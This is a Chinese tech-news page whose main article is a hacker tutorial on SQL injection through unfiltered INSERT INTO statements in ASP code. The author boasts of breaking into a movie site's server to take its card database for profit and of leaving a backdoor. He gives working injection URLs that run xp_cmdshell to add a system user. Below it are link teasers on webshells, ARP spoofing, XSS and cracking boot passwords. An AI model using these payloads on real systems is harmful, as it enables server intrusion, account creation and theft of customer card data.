利用insert Into进行注入?该怎么做?
刚才到了酷吧,坐在收银台旁边和收银的MM聊了几句话;
突然看到"电影影线"有张海报,上面写着:
凡是购买该站点卡密码最后一位数是6或7便可获赠面值5元的易卡一张;
我想,这个网站整个数据在我手里,我要是把那几十万张卡全拿去换钱不是发达了?
随即马上到他服务器把库拿下来,顺便在服务器上再留个后门;
在过程中有另一个想法便是本文的重要点;利用insert Into 进行注入。
关于SQL注入,以前常用的或很多朋友所懂的也只不过是在select 语句中ID=变量未过产生的注入点,例如http://www.gzint.com/xxx.asp?id=1 ;exec master..xp_cmdshell "net user xiaomo aa /add"--
我们可否利用insert Into Table的语句进行注入呢?这样的话,我们可以在某某有漏洞的网站上填写QQ或Email或地址的地方执行任何命令了哦.记得以前粗略地和"乱刀"讨论过,不过一直没有实际行动,刚才发现了一下,原来真的可以做到这一点。呵呵。
举下例: 某个页面xiaomo.asp中有如下一句代码:
Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’"&Request("u")&"’)"我们可以利用Request("U")未过滤的变量执行任意系统命令.
这段很简单,Request("U")在语句后面,直接提交:
http://localhost/xiaomo.asp?u=2’);exec master..xp_cmdshell "net user xiaomo aa /add"--便可添加一个xiaomo密码为aa的系统用户
因为构造的代码变成了:
Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"--当然理所当然地"正确"执行了。
=============================================
我们换个思路,如果页面中的漏洞代码是:
Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’"&Request("u")&"’,’1’,’1’,’1’,’1’)"Request("u")跑到前面去了,这该怎么办呢?
其实也很简单,变通一下即可,提交:
http://localhost/xiaomo.asp?u=3’,’1’,’1’,’1’,’1’);exec master..xp_cmdshell "net user xiaomo aa /add"----看出来了没?第一个变量代表了要写入的所有变量,而后面就不而而至了,哈哈。。
但有个问题是,我们必须得知道对方语句是怎么写,利在检查指定程序漏洞时所应用
网站流量被黑客劫持是因为黑客们修改了wordpress核心文件
大家都知道如果黑客入侵我们的网站后,他们是可以肆意的在上面搭载钓鱼页面,传播恶意软件,盗取敏感信息等,这非常不利于我们网站。垃圾内容和黑名单近期,我们分析了一个被重定向到第三方域名的网站。黑客通常
详情2018-01-22 21:31:17责编:llp 来源:驱动管家手机root好不好?手机root为漏洞利用打开方便之门
也许你的手机ROOT只是为了安装一款游戏,安装一个工具。对我们普通人来说,ROOT代表着方便和自由,其实你不知道的是,它同时也为黑客带来了侵犯你隐私的方便和自由。看看ROOT后的手机是怎样为漏洞大开方便之门的
详情2018-01-12 10:55:50责编:llp 来源:驱动管家html5安全策略的补充内容 html5安全策略的改进之处
HTML5对旧有的安全策略进行了非常多的补充。一、iframe沙箱HTML5为iframe元素增加了sandbox属性防止不信任的Web页面执行某些操作,例如访问父页面的DOM、执行脚本、访问本地存储或者本地数据库等等。但是这个安全
详情2018-02-06 15:51:06责编:llp 来源:驱动管家你知道中国菜刀吗?网站管理软件中国菜刀怎么用?
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候
详情2018-01-24 11:01:35责编:llp 来源:驱动管家详解arp欺骗 arp欺骗会导致什么问题?
了解ARP地址解析协议我们先来简单描述下什么是ARP,ARP是地址解析协议,ARP协议主要负责将局域网中的32位IP地址转换为对应的48位物理地址,即网卡的MAC地址,比如IP地址为192 168 0 1计算机上网卡的MAC地址为00-0
详情2018-02-13 14:07:14责编:llp 来源:驱动管家小米miui刷机漏洞的危害 miui系统存在什么问题?
该漏洞的成功利用不需要任何条件。通过该漏洞,任何应用软件可以获取下列信息:- 硬件数据,包括:系统版本、系统编译信息、内存和CPU信息、电池信息、IMEI、基带版本、设备生产序号等- 当前状态数据,包括:当
详情2018-02-06 18:34:44责编:llp 来源:驱动管家csrf worm技术分析 百度有哪些漏洞会导致web蠕虫出现?
漏洞起因:百度是国内最大的中文搜索引擎。同时百度也提供了百度空间、百度贴吧等BLOG社区服务,拥有海量的用户群,号称全球最大中文社区。80sec发现过百度产品一系列的安全漏洞,其中一些问题得到了有效的修补,
详情2018-02-25 14:59:26责编:llp 来源:驱动管家百度知道漏洞 百度知道存在反射型xss漏洞怎么办?
百度知道百度知道存在反射型XSS,可以做诱惑点击导致蠕虫。http: zhidao baidu com utask qb info?callback=1 加强过滤。2 JSON接口存在风险:JSON接口需要设置Co
详情2018-02-05 09:31:22责编:llp 来源:驱动管家入侵win xp系统的方法有哪些?入侵win xp系统的方法汇总
这里将向你揭示黑客入侵Windows XP操作系统常用的七种方法。第一招、屏幕保护在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当
详情2018-01-15 11:08:42责编:llp 来源:驱动管家如何破解电脑开机密码?简单一招就可以破解电脑开机密码
碰到电脑就像玩一会,但是,电脑开机需要密码怎么办?现在教你小小一招巧解任何电脑的开机密码。无需任何工具,无需放电。任何电脑当开机需要密码时,只需将机箱打开,把里面的声卡或其它任何一个零件拔下来,然
详情2018-01-14 18:07:50责编:llp 来源:驱动管家
- 跨站脚本钓鱼攻击是怎么回事?具体步骤是什么?
- Windows 7中怎么删除旧的驱动设备?几个步骤就能搞定了
- UG怎么实现多边形零件阵列装配?试试这个方法
- Altium Designer怎么进行PDF文件的导出?Altium Designer教程
- 怎么才能把握好笔记本电池充电的时间
- 红米手机原装电池好不好?红米手机原装电池评测介绍
- 【游戏攻略】《绝地求生大逃杀》移动中开枪准吗?移动射击准度分析
- xp系统怎么还原?xp系统还原功能使用方法介绍
- 最好用的一键还原软件帮你快速恢复你的电脑系统
- 计算机主板CMOS界面英文翻译—轻松设置CMOS
- 锤子手机m1 root的准备工作和具体操作步骤
- 买中兴星星1号还是红米note?关键要看它们的性能参数
- url是什么意思?url的标准格式是什么
- 如何创建本地连接 创建本地连接的方法
- 开放53、445端口后怎么利用dns溢出漏洞入侵?
- 入侵如何在对方的服务器打上微软自家的补丁解决互传文件的问题?
- win10装不上GTX1080显卡驱动怎么回事?如何解决
- 电脑怎么过滤蓝光? flux过滤蓝光保护眼睛的教程
- 用快用苹果助手怎么清理手机里面的垃圾
- 佳能电池充不进去电是什么原因造成的?